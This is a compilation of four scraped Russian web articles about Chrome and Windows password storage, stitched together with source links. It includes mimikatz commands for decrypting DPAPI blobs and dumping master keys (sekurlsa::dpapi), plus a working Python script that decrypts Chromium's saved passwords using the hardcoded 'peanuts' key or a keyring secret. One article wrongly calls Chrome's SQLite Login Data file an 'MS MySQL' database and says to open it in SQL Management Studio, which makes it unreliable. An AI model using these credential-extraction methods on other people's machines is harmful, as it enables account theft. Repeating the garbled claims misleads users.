Один из эффективных способов обеспечения безопасности при наличии доступа к компьютеру у нескольких людей – установить пароль на браузер Гугл Хром. Иными словами, для запуска веб-обозревателя нужно обязательно ввести ключ. В моменты совмещения рабочего пространства с другими людьми это эффективный способ. Однако, рекомендуем в Windows создать отдельные учётные записи и пользоваться ими, а дополнительно усилить защиту паролем на открытие.

Описанной функцией обладает приложение Game Protector. Однако, после её использования не всегда браузер восстанавливается к полностью рабочему состоянию. Да и другой пользователь может открыть файл с паролями через одну из утилит. В силу этих сложностей установку пароля на открытие Хрома рекомендовать не будем, есть риск повреждения файлов программы. Лучше полностью скрыть интересующую папку. Пользователь не сможет запустить браузер или добраться до файлов до момента указания ключа доступа, гарантируя полную безопасность.

Как поставить пароль на Google Chrome:

1. Скачиваем приложение Anvide Lock Folder.
2. Устанавливаем и запускаем программу от имени администратора ПК.
3. Жмём на изображение плюса и через проводник выбираем папку C:\Program Files (x86)\Google\Chrome\Application.
4. Нажимаем на значок закрытого замка или жмём на F
5. Дважды вводим пароль.

В момент, когда потребуется открыть папку, запускаем утилиту и нажимаем на значок раскрытого замка. После указания ключа, файлы снова отобразятся и браузер окажется доступным.

На этом всё, мы дали все необходимые сведения, чтобы открыть сохранённые пароли в Гугл Хром, отредактировать их и заблокировать браузер ключом. Осталось только с умом использовать информацию. Она позволит не только сэкономить время, но и оставаться в безопасности даже при активном сёрфинге в интернете.

Источник: https://GuideComp.ru/kak-posmotret-sohranennye-paroli-v-google-chrome.html

Расшифровка хранимых в Windows паролей с помощью mimikatz и DPAPI

В статье «Как взломать пароль Windows» мы узнали, где и как Windows хранит пароли пользователей для входа в ОС, научились извлекать эти пароли в виде хеша и узнали, как можно подобрать пароль брут-форсом. Также мы познакомились с программой mimikatz, которую мы использовали для извлечения паролей в текущей системе, либо из файлов реестра Windows от другого компьютера.

В этой статье мы продолжим знакомиться с внутренним устройством Windows, а именно как эта операционная система хранит пароли других приложений. Также мы продолжим знакомиться с возможностями mimikatz.

Как Windows хранит пароли

Кроме пароля пользователя для входа в Windows (который, кстати, может быть не установлен), в ОС хранятся другие пароли:

• Диспетчер учётных данных (Credential Manager)
• Windows Vault,
• Пароли браузера IE
• Пароли для подключения к сетям Wi-Fi
• Сертификаты
• Пароли от VPN
• Ключи SSH
• Пароли браузера Google Chrome
• Учётные данные приложения Google Talk, Skype, Dropbox, iCloud, Safari

Все эти пароли хранятся, конечно, в зашифрованном виде. Для шифрования перечисленных паролей и учётных данных используется DPAPI (Data Protection Application Programming Interface). Для конечного пользователя все процессы шифрования и расшифровки данных прозрачны, то есть не требуют каких-либо действий с его стороны.

Для шифрования этих данных используется пароль пользователя. Точнее говоря, генерируются мастер ключи, с помощью которых и происходит шифрование и расшифровка данных, а пароль пользователя используется для расшифровки мастер ключей. У одного пользователя может быть много мастер ключей. Предусмотрен механизм на случай смены пароля пользователя: по сути, хранятся хеши от всех старых паролей и делается попытка расшифровать мастер ключ пока не будет найден подходящий хеш.

Отсюда важное следствие: в системе для текущего пользователя возможно расшифровать, например, пароли из веб-браузера Google Chrome. Но если скопировать файл, где хранятся пароли этого браузера, на другой компьютер без необходимого мастер ключа, то не удастся расшифровать эти пароли.

Как зашифровать и расшифровать с помощью DPAPI

Как уже упомянуто чуть выше, DPAPI используется для шифрования и расшифровки данных. DPAPI довольно прост не только для конечных пользователей, но и для разработчиков, которые хотят воспользоваться этим шифрованием — имеются две функции, которые можно вызвать из приложения: шифрование и расшифровка.

Перед тем как переходить к извлечению паролей из веб-браузеров и других хранящихся на Windows паролей, давайте познакомимся поближе к DPAPI. Уже написано много хороших статей, объясняющих работу DPAPI. Не буду пытаться их пересказать, а просто приведу ссылки в конце этой статье. Вместо того, чтобы вникать в технические детали DPAPI, давайте пойдём практическим путём: зашифруем строку или файл с помощью DPAPI.

Все последующие действия мы будем выполнять в программе mimikatz, поэтому запустите её, как описано в этой статье.

Для работы с DPAPI используется модуль dpapi, для шифрования данных используется команда protect. У этой команды есть одна обязательная опция /data, после которой нужно указать путь до файла, который вы хотите зашифровать, или текстовую строку.

К примеру, я хочу зашифровать строку Test string to encrypt:

dpapi::protect /data:»Test string to encrypt»

Обратите внимание на секцию «Blob:» — это и есть зашифрованные данные в бинарном виде.

Вместо вывода зашифрованных данных на экран, их можно сохранить с помощью опции /out:

dpapi::protect /data:»Test string to encrypt» /out:crypted.txt

В результате будет создан файл crypted.txt. Этот файл содержит зашифрованные данные, а именно строку «Test string to encrypt».

Для расшифровки используется функция blob (так называются зашифрованные этим методом данные) из этого же модуля dpapi. У этой функции одна обязательная опция — /in, после которой нужно указать данные для расшифровки. Для расшифровки также нужно указать опцию /unprotect, в противном случае будет только показана информация о blob (зашифрованных данных) без их расшифровки:

dpapi::blob /in:crypted.txt /unprotect

Вы можете увидеть на экране исходную строку.

Если вы хотите, чтобы расшифрованные данные сохранились в файл, то используйте опцию /out.

Что произойдёт, если я перенесу файл crypted.txt на другой компьютер и попытаюсь его расшифровать этой же командой? Давайте попробуем:

А на другом компьютере расшифровка завершилась неудачей и выведена ошибка:

* using CryptUnprotectData API ERROR kuhl_m_dpapi_unprotect_raw_or_blob ; NTE_BAD_KEY_STATE, needed Masterkey is: {ac45381a-d9db-4c68-b0e9-7410667c3984}

В этой ошибке сказано, что нужен мастер ключ ac45381a-d9db-4c68-b0e9-7410667c3984.

Строка ac45381a-d9db-4c68-b0e9-7410667c398 является хешем мастер ключа. Можно сказать, что это идентификатор или отпечаток ключа. На исходном компьютере, где шифровались данные, их расшифровка проходит легко и непринуждённо. А попытки расшифровать эти данные не имея мастер ключа, завершаются неудачей. То есть нам нужно указать мастер ключ с первого компьютера — причём не любой мастер ключ (у каждого пользователя их может быть много), а именно тот, которым шифровались данные.

Я уже извлёк нужный мастер ключ, поэтому укажу его с помощи опции /masterkey и вновь запущу команду расшифровки на другом компьютере:

dpapi::blob /in:crypted.txt /unprotect /masterkey:5dccd3bea06a52d4355fa6b03421845c9fe96277db0d5af1a24eb3dae14d6fc66b386a3a235a29327d0dc1f7ca990389644af173893d4cf3392b3950953dd8

В этот раз всё прошло удачно:

Как узнать мастер ключи Windows

В mimikatz есть функция, которая извлекает все мастер ключи для текущего пользователя. Но прежде чем перейти к ней, давайте «пощупаем» сами мастер ключи, чтобы они не были для нас чем-то абстрактными.

В расшифрованном виде пример мастер ключа выглядит так: 5dccd3bea06a52d4355fa6b03421845c9fe96277db0d5af1a24eb3dae14d6fc66b386a3a235a29327d0dc1f7ca990389644af173893d4cf3392b3950953dd8

Зашифрованные мастер ключи хранятся в папке вида %appdata%\Microsoft\Protect\{sid}\*. В этой записи:

• %appdata% означает C:\Users\\AppData\Roaming
• {sid} означает SID пользователя

В CMD (Win+r → набрать cmd) свой SID можно посмотреть командой:

wmic useraccount where name=»%USERNAME%» get sid

Предыдущая команда не сработает в PowerShell. Следующие команды сработают как в CMD, так и в PowerShell.

Чтобы узнать свой SID:

whoami /user

Чтобы узнать SID всех пользователей:

wmic useraccount get name,sid

Зашифрованные файлы мастер ключей на жёстком диске:

Функция dpapi::masterkey умеет расшифровывать мастер ключи. Если использовать эту функцию только с опцией /in, после которой указать путь до мастер ключа, то будет выведена информация о нём без его расшифровки:

dpapi::masterkey /in:»%appdata%\Microsoft\Protect\S-1-5-21-4099021954-1290662600-116018068-1001\ac45381a-d9db-4c68-b0e9-7410667c3984″

Для того, чтобы извлечь сразу все мастер ключи текущего пользователя выполните команду:

sekurlsa::dpapi

Мастер ключи в этой секции:

Источник: https://HackWare.ru/?p=11350

Как посмотреть сохранённые пароли в браузере Google Chrome (Хром)

Пользователи интернета ежедневно посещают десятки или даже сотни различных сайтов. Большинство ресурсов требуют регистрации, поэтому нам становится очень сложно запомнить все придуманные ранее логины и пароли от аккаунтов.

Чтобы организовать информацию, необходимую для авторизации на сайтах, разработчики браузеров создали специальные системы для сохранения паролей пользователей.

Рассмотрим подробнее, как посмотреть сохранённые пароли в Chrome – самом популярном обозревателе от компании Google.

Расположение паролей

Получить доступ к окну со всеми паролями можно несколькими способами. Самый простой вариант – введите в адресную строку браузера текст chrome://settings/passwords — это адрес локальной страницы настроек, которая содержит данные автоматического входа на сайты. В итоге вы должны попасть на такую страничку:

Рис. 1 – страница сохранённых логинов и паролей в Chrome

Важно! Этот способ включения окна настроек может не работать в более старых версиях обозревателя.

Вы можете использовать еще один способ входа во вкладку с паролями:

• запустите браузер и на домашней странице найдите клавишу меню (правый верхний угол панели инструментов);
• кликните на пункт «Настройки»;

Рис. 2 – меню браузера «Хром»

• прокрутите открывшееся окно вниз и кликните на клавише «Дополнительные настройки»;

Рис. 3 – окно настроек

• теперь, среди всех новых параметров, найдите группу «Пароли и формы»;
• в пункте «Сохранять пароли» нажмите на кнопку «Показать» и перед вами откроется страница, как на рисунке 1.

Рис 4. – параметр настроек «Пароли и формы»

Помимо настроек обозревателя, данные о сохранённых паролях можно посмотреть на самом ПК.

«Хром» записывает данные пользователей в системный файл, который расположен на жёстком диске компьютера.

Адрес файла может отличаться, в зависимости от используемой операционной системы.

Ниже на рисунке приведён список самых популярных ОС и адреса директорий, в которых хранится файл под названием Login Data:

Рис 5. – адреса директорий в разных ОС

Перейдите в необходимую папку на вашем жёстком диске и найдите файл Login Data. Он не имеет расширения, соответственно, открыть просто так его нельзя.

Рис 6. – локальный файл с данными пользователя

Как посмотреть логин и пароль для сайта?

После того, как вы нашли расположение настроек автосохранения или локальный файл, который их содержит, можно приступать к просмотру нужных паролей и логинов для сайтов.

Чтобы увидеть пароли в самом браузере, выберите нужный вам сайт и нажмите на клавишу показать.

Далее система безопасности автоматически запросит ввести имя пользователя ОС и пароль.

Рис. 7 – просмотр паролей в браузере «Хром»

Если, по каким-либо причинам, у вас нет возможности получить доступ к данным в самом браузере, можно попробовать «вытащить» информацию из файла Login Data.

По сути, содержимое этого файла не имеет определённого формата, но он является составляющей локальной базы данных MS MySQL и хранит в себе упорядоченную информацию пользователей браузера (список сайтов, логины, пароли, установленные расширения и прочее).

Как же открыть файл? Так как Login Data создан в основном для разработчиков, то и открыть его можно с помощью специальных программ для разработки.

Чтобы открыть файл Login Data, запустите студию, затем подключитесь к локальной БД, которая установлена у вас на ПК:

Рис. 8 – главное окно SQL Management Studio 2014

После успешного соединения, нажмите на вкладку «Файл», а потом на «Открыть». В открывшемся окне проводника компьютера, найдите Login Data и запустите его. В окне студии появится следующая таблица:

Рис.9 – таблица базы данных с логинами и паролями пользователя

Поля username_value и password_value содержат значения логинов и паролей соответственно.

Справка: если у вас нет возможности установить на свой ПК отдельную студию для разработки баз данных, можно воспользоваться утилитой DB Browser SQL. С её помощью вы сможете просматривать само содержимое файла, но без права редактирования полей базы данных.

Удаление пароля

Чтобы удалить связку «логин-пароль» из окна автосохранения, необходимо выбрать нужный сайт и нажать на крестик, как показано на рисунке ниже. После этого данные для входа на ресурс будут стёрты.

Рис. 10 – удаление сохранённого пароля для конкретного сайта

Аналогичным образом пользователи могут отредактировать сохранённые данные. Введите в поле логин или пароль новую информацию и сохраните изменения.

Отключение параметра сохранения паролей в браузере

Если вы хотите, чтобы «Хром» больше никогда не сохранял новые пароли для сайтов, необходимо отключить функцию автоматического сохранения данных.

Для этого в настройках «Пароли и формы» уберите галочку напротив пункта «Автоматический вход», как показано на рисунке ниже:

Рис. 11 – отключение автоматического входа

Теперь браузер не будет сохранять введённые логины и пароли для новых сайтов.

Чтобы не выполнялся автоматический вход для ранее используемых ресурсов, удалите все сохранённые пароли и логины вручную.

Затем следует обязательно перезагрузить компьютер, чтобы новые настройки файла Login Data вступили в силу.

Как защитить сохранённые пароли?

Новая политика конфиденциальности Chrome сразу после релиза не включала в себя пункт об отдельной защите сохранённых паролей пользователей.

Этот инцидент в начале 2014 года привлёк довольно много внимания и негодования от пользователей браузера.

Теоретически, каждый вирус, троян или другой вид вредоносного ПО мог получить доступ к сохранённым паролям обозревателя от Гугл.

Что же должны делать юзеры, которые хотят максимально обезопасить свои данные?

Для обеспечения защиты от несанкционированного доступа следуйте простым правилам:

• Антивирус или брандмауэр операционной системы должен быть включён во время использования интернета;
• Не забывайте регулярно обновлять вирусную базу защитника. Это обеспечит вас от угроз, которые несут всевозможные трояны;
• Не нажимайте на клавишу «сохранить пароль для сайта?». Таким образом данные не будут внесены в базу паролей, и другие пользователи или программы не смогут их использовать;
• Используйте утилиты, которые ограничивают доступ к системным директориям вашего ПК. К примеру, Protected Folder, Folder Lock или PasswordProtect. С помощью одной из этих утилит вы можете поставить пароль на папку с паролями браузера. Другие программные смогут получить доступ к содержимому.

В конце 2014 года разработчики Google создали демоверсию системы защиты сохранённых логинов и паролей.

На сегодняшний день она все ещё работает в тестовом режиме и доступна только на Mac OS и Windows.

Суть системы состоит в том, что посмотреть любой пароль можно только при условии, если вы правильно ввели пароль к своей учётной записи ПК.

Рис. 12 – парольная защита сохранённых данных

Защитник не будет работать, если у вас на компьютере не установлен пароль для входа в систему.

Тематический видеоролик:

Источник

Источник: https://pomogaemkompu.temaretik.com/1004214173352332138/kak-posmotret-sohranyonnye-paroli-v-brauzere-google-chrome-hrom/

Chrome/Chromium: Linux, keyrings && Secret Service, шифрование и хранение паролей

Одним из поводов настолько углубиться в keyrings (см. What is: Linux keyring, gnome-keyring, Secret Service, и D-Bus) был факт того, что Chromium, внезапно, при отсутствии keyring в Linux будет хранить пароли в «открытом виде».

Собственно, давайте попробуем найти — как и где Chromium хранит пароли, и, самое важное — шифрует ли он их?

Chromium и keyring

Документация нам говорит:

On Linux, Chrome previously stored credentials directly in the user‘s Gnome Keyring or KWallet, but for technical reasons, it has switched to storing the credentials in “Login Data” in the Chrome user’s profile directory, but encrypted on disk with a key that is then stored in the user’s Gnome Keyring or KWallet. If there is no available Keyring or KWallet, the data is not encrypted when stored.

Т.е:

1. пароли Chromium хранит в SQLite базе «Login Data» ('/home/setevoy/.config/chromium/Default/Login Data')
2. если gnome-keyring или KWallet установлены — то Chrome будет шифровать данные в базе с помощью пароля, который Chromium хранит в этом хранилище
3. если их нет, и Secret Service не активен — то пароли будут храниться в открытом виде, plain text

Проверим.

Chromium без keychanin

Попробуем получить пароль из базы с Chromium без keyring.

Что бы указать ему — какой бекенд использовать, можно использовать опцию google-chrome —password-store=basic — для хранения plain text.

Другие параметры — gnome или kwallet, см. man chromium:

—password-store=

Set the password store to use.  The default is to  automatically

detect  based  on  the  desktop  environment.  basic selects the

built in,  unencrypted  password  store.   gnome  selects  Gnome

keyring.  kwallet selects (KDE) KWallet.  (Note that KWallet may

not work reliably outside KDE.)

Кроме того — проверим D-Bus сервисы, что бы убедиться, что никакой Secret Service сейчас не активен:

qdbus —session org.freedesktop.DBus / org.freedesktop.DBus.GetConnectionUnixProcessID org.freedesktop.secrets

Error: org.freedesktop.DBus.Error.NameHasNoOwner

Could not get PID of name 'org.freedesktop.secrets': no such name

Хорошо.

Создаём каталог для данных Chromium:

mkdir /tmp/data-chrome-test-1

chromium —user-data-dir=/tmp/data-chrome-test-1 —password-store=basic

Логинимся куда-то, сохраняем пароль, закрываем браузер, проверяем базу:

sqlite3 /tmp/data-chrome-test-1/Default/Login\ Data 'select username_value, password_value from logins;'

testuser|v10�#�c�yF�b�f���

Отлично — в поле password_value SQLite базы какой-то пароль есть.

Кстати, просмотреть все поля и их типы в таблице logins можно с помощью .schema:

sqlite3 ~/.config/chromium/Default/Login\ Data '.schema logins'

CREATE TABLE IF NOT EXISTS «logins» (origin_url VARCHAR NOT NULL, action_url VARCHAR, \

username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB \

…));

CREATE INDEX logins_signon ON logins (signon_realm);

Chromium с keychanin

Теперь попробуем получить пароль из SQLite базы с Chromium, который использует keyring. Для этого — включаем поддержку Secret Service в KeePass, который нам заменит «стандартный»  gnome-keyring, и создаём второй каталог для данных Chromium:

mkdir /tmp/data-chrome-test-2

Запускаем браузер, но теперь указываем —password-store=gnome, и меняем user-data-dir, что бы использовать чистую SQLite базу с паролями:

chromium —user-data-dir=/tmp/data-chrome-test-2 —password-store=gnome

Ещё раз логинимся, сохраняем пароль, проверяем базу:

sqlite3 /tmp/data-chrome-test-2/Default/Login\ Data 'select username_value, password_value from logins;'

testuser|v11���H!@���2�jA�

Ага!

Во-первых — префикс тут v11, а не v10, во-вторых — строка явно длиннее.

Chromium passwords decrypt

Теперь попробуем разобраться:

1. во-первых — пароль из «незашифрованого» хранилища отдаётся явно не plain text — почему?
2. во-вторых — как получить пароль из «зашифрованого» хранилища?

Для проверки — поковыряем исходники.

Chrome v10 vs v11

Для начала — что за v10 и v11?

Смотрим содержимое os_crypt_linux.cc — https://cs.chromium.org/chromium/src/components/os_crypt/os_crypt_linux.cc?l=38:

…// Password version. V10 means that the hardcoded password will be used.// V11 means that a password is/will be stored using an OS-level library (e.g// Libsecret). V11 will not be used if such a library is not available.// Used for array indexing.enum Version { V10 = 0, V11 = 1,};…

Т.е. v10 — это префикс для незашифрованных паролей, а v11 — для зашифрованных.

Хотя при этом в обоих случаях выборка из SQLite возвращает нам набор символов, а не пароль в открытом виде…

Сейчас узнаем почему.

Начнём с конца файла, с функции DecryptString():

Так что всё оказалось намного проще:

1. если keyring есть — то Chromium сгенерирует мастер-пароль, и сохранит в базе этого keyring-сервиса
2. если keyring нет, и Secret Service отключен — то Chromium использует hardcoded мастер-пароль «peanuts«

И уже используя этот пароль — будет составлен key для шифрования паролей в SQLite базе данных.

Python скрипт для получения паролей

Теперь проверим всё это на практике, что бы «потрогать руками» и увидеть как оно в самом деле работает.

Среди прочего видим, что для шифрования используется AES 128 bit CBC:

…// Key size required for 128 bit AES.const size_t kDerivedKeySizeInBits = 128;…

Далее в функции GetEncryptionKey() смотрим, как создаётся ключ для шифрования:

… // Create an encryption key from our password and salt. std::unique_ptr encryption_key( crypto::SymmetricKey::DeriveKeyFromPasswordUsingPbkdf2( crypto::SymmetricKey::AES, *password, salt, kEncryptionIterations, kDerivedKeySizeInBits)); DCHECK(encryption_key); return encryption_key;…

Следовательно, что бы расшифровать запись из базы данных — нам нужны такие данные, всё указано сразу в файле в переменных:

1. мастер-пароль password — именно он возвращается в GetPasswordV10() или GetPasswordV11()
2. соль — const char kSalt[] = «saltysalt»
3. итерации — const size_t kEncryptionIterations = 1
4. длина ключа — const size_t kDerivedKeySizeInBits = 128

Для декрипта паролей — нагуглился простой скрипт тут>>>, немного его переделаем под себя, получается такой:

#! /usr/bin/env python3 import sqlite3 from Crypto.Cipher import AESfrom Crypto.Protocol.KDF import PBKDF2 def get_encrypted_data(db_path): # choose a database conn = sqlite3.connect(db_path) cursor = conn.cursor() # connect and egt exncypted data data = cursor.execute('SELECT action_url, username_value, password_value FROM logins') return data # to get rid of paddingdef clean(x): return x[:-x[-1]].decode('utf8') def get_decrypted_data(encrypted_password): print(«Decrypting the string: {}».format(encrypted_password)) # trim off the 'v10' that Chrome/ium prepends encrypted_password = encrypted_password[3:] # making the key salt = b'saltysalt' iv = b' ' * 16 length = 16 iterations = 1 pb_pass = «peanuts».encode('utf8') key = PBKDF2(pb_pass, salt, length, iterations) cipher = AES.new(key, AES.MODE_CBC, IV=iv) decrypted = cipher.decrypt(encrypted_password) print(clean(decrypted)) if __name__ == «__main__»: db_path = '/tmp/data-chrome-test-1/Default/Login Data' for url, user, encrypted_password in get_encrypted_data(db_path): get_decrypted_data(encrypted_password)

Запускаем:

./get_chrome_pass.py

Decrypting the string: b'v10\xd4#\xd6c\xabyF\xc6b\xdef\x06\xce\x14\xe3\xc5'

test911911

Отлично — есть наш пароль.

В этот раз мы получили его из «незашифрованного» хранилища.

Chromium && Secret Service

Теперь — включаем поддержку Secret Storage в KeePass (см What is: Linux keyring, gnome-keyring, Secret Service, и D-Bus), что бы эмулировать установленный gnome-keepass, перезапускаем KeePass.

Добавляем папку для новой базы данных Chromium:

mkdir /tmp/data-chrome-test-2/

Запускаем Chromium с каталогом данных data-chrome-test-2 из неё и указываем —password-store=gnome:

chromium —user-data-dir=/tmp/data-chrome-test-2/ —password-store=gnome

Логинимся, сохраняем пароль ещё раз — и Chromium в KeePass создал нам две записи:

1. Chrome Safe Storage Control
2. Chromium Safe Storage

Смотрим их атрибуты — там всё указано:

Можно посмотреть через D-Bus и Secret Service, что бы проверить коллекцию:

secret-tool search Title 'Chromium Safe Storage'

[/org/freedesktop/secrets/collection/Main/f0fdc4706ef44958b716e28c13d66bed]

label = Chromium Safe Storage

secret = P5pUwxbWaIBBVU0+LATOcw==

…

schema = chrome_libsecret_os_crypt_password_v2

…

attribute.Title = Chromium Safe Storage

…

attribute.application = chromium

…

attribute.Path = /Chromium Safe Storage

Теперь попробуем использовать этот пароль (значение атрибута secret выше) из Chromium Safe Storage в качестве значения переменной pb_pass в нашем скрипте.

Выходим из Chromium, что бы разлочить базу, иначе будет ошибка вида:

./get_chrome_pass.py

Traceback (most recent call last):

File «./get_chrome_pass.py», line 50, in 

for url, user, encrypted_password in get_encrypted_data(db_path):

File «./get_chrome_pass.py», line 15, in get_encrypted_data

data = cursor.execute('SELECT action_url, username_value, password_value FROM logins')

sqlite3.OperationalError: database is locked

В скрипте меняем базу (путь к ней):

…if __name__ == «__main__»: # db_path = '/tmp/data-chrome-test-1/Default/Login Data' db_path = '/tmp/data-chrome-test-2/Default/Login Data' for url, user, encrypted_password in get_encrypted_data(db_path): get_decrypted_data(encrypted_password)

Вместо «peanuts» подставляем в pb_pass значение из Chromium Safe Storage:

…# pb_pass = «peanuts».encode('utf8') pb_pass = «P5pUwxbWaIBBVU0+LATOcw==».encode('utf8')…

Пробуем:

./get_chrome_pass.py

Decrypting the string: b'v11\xfc\x82\xf7H!@\x86\xb7\x982\xa8\x1fjA\xfd'

test911911

Готово — получили пароль из зашифрованного значения SQLite базы.

Вывод

Собственно, самое важное — пароли в SQLite шифруются всегда. Просто для систем, в которых нет бекенда типа gnome-keyring с поддержкой Secret Service — то пароль для шифрования всегда будет один и тот же для всех пользователей Chromium, что, разумеется, нельзя рассматривать, как защиту.

Источник: https://devsday.ru/blog/details/4018